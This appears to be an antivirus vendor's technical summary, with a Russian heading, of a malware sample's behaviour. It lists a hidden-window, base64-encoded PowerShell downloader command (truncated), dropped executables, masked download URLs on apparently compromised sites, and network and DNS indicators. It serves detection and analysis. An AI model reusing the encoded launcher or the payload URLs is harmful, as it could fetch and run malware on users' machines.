Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAEYAWQBQAEkAegBuAGQAPQAnAEMAVQBFAEYAQgB6AHoAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBVAFIASQBUAGAAeQBQAFIATwBgAFQATwBDAG8AbAAiACAAPQAgAC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1552
- %TEMP%\1172269.cvr
- %HOMEPATH%\489.exe
- %HOMEPATH%\489.exe
- 'we###ack.com.au':80
- 'we###ack.com.au':443
- 'mx####erests.com':80
- 'mx####erests.com':443
- 'mo###etech.net':80
- 'ro##web.com':80
- 'sa####bbeyarts.com':80
- http://we###ack.com.au/wp-includes/U890802/
- http://mx####erests.com/gulf/dhcWCM/
- http://mo###etech.net/images/TnpY/
- http://ro##web.com/sea/IOm310/
- http://ro##web.com/domain/html/domain-not-found.html
- http://sa####bbeyarts.com/SALLY_ART_2014/UqN4k/
- 'we###ack.com.au':443
- 'mx####erests.com':443
- DNS ASK we###ack.com.au
- DNS ASK mx####erests.com
- DNS ASK mo###etech.net
- DNS ASK ro##web.com
- DNS ASK sa####bbeyarts.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAEYAWQBQAEkAegBuAGQAPQAnAEMAVQBFAEYAQgB6AHoAeQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAQwBVAFIASQBUAGAAeQBQAFIATwBgAFQATwBDAG8AbAAiACAAPQAgAC...' (со скрытым окном)